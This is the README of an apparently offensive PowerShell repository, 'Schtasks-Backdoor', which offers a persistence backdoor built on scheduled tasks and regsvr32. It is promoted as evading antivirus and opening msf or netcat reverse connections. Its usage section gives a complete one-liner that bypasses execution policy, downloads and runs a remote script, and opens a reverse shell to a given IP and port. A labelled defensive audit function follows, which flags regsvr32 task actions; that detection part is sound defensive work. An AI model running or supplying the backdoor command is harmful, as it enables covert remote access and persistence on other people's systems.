PowerShell persistence backdoor
Files:
README.md
Schtasks-Backdoor.ps1
example.gif (commit message "add demo", Oct 17, 2016)

Schtasks-Backdoor

About

A PowerShell backdoor script for maintaining access (persistence).

Principle

schtasks+regsvr32

Function

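One method of maintaining access inside an internal network. It evades antivirus well and takes effect after a reboot. It supports msf and nc reverse connections, and the client shows no obvious anomaly. Custom command execution shows a pop-up window (you can modify this yourself; one idea is to use mshta). In practice, nc or msf is generally used.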

Usage

powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 8.8.8.8 -port 8081 -time 2"

The advantage of this script is that it does not need to bypass UAC.

Example

example
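
A defender-side check for the schtasks+regsvr32 combination named under Principle, as an added example that is not part of this repository: it lists scheduled tasks whose action invokes regsvr32. The names Find-Regsvr32TaskAction and New-SampleTask and the sample task objects are constructed for illustration; on a live host the input comes from Get-ScheduledTask.

```powershell
# Added example (audit helper); not code from the Schtasks-Backdoor repository.
# Find-Regsvr32TaskAction and New-SampleTask are hypothetical names for this illustration.
function Find-Regsvr32TaskAction {
    param(
        # Task objects shaped like Get-ScheduledTask output
        [Parameter(Mandatory)] [object[]] $Task
    )
    foreach ($t in $Task) {
        foreach ($a in $t.Actions) {
            # Exec actions carry Execute/Arguments; other action types yield an empty string
            $cmdLine = ("{0} {1}" -f $a.Execute, $a.Arguments).Trim()
            if ($cmdLine -match 'regsvr32') {      # -match is case-insensitive
                [pscustomobject]@{
                    TaskPath = $t.TaskPath
                    TaskName = $t.TaskName
                    RunAs    = $t.Principal.UserId
                    Command  = $cmdLine
                    HasUrl   = [bool]($cmdLine -match 'https?://')
                }
            }
        }
    }
}

# Constructed sample data so the function can be exercised offline.
function New-SampleTask($Name, $User, $Exe, $TaskArgs) {
    [pscustomobject]@{
        TaskPath  = '\'
        TaskName  = $Name
        Principal = [pscustomobject]@{ UserId = $User }
        Actions   = @([pscustomobject]@{ Execute = $Exe; Arguments = $TaskArgs })
    }
}
$sample = @(
    New-SampleTask 'ExampleUpdater' 'SYSTEM' 'C:\Program Files\Example\updater.exe' '/silent'
    New-SampleTask 'ExampleTaskA' 'alice' 'regsvr32.exe' 'http://example.invalid/constructed'
    New-SampleTask 'ExampleTaskB' 'alice' 'cmd.exe' '/c regsvr32 C:\Users\Public\constructed.dll'
)

# Reports ExampleTaskA (HasUrl = True) and ExampleTaskB (HasUrl = False)
Find-Regsvr32TaskAction -Task $sample | Format-List

# On a live Windows host, audit the real task store instead:
# Find-Regsvr32TaskAction -Task (Get-ScheduledTask)
```

Because the README states that no UAC bypass is needed, review hits that run under ordinary user accounts (the RunAs field), not only tasks that run as SYSTEM.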
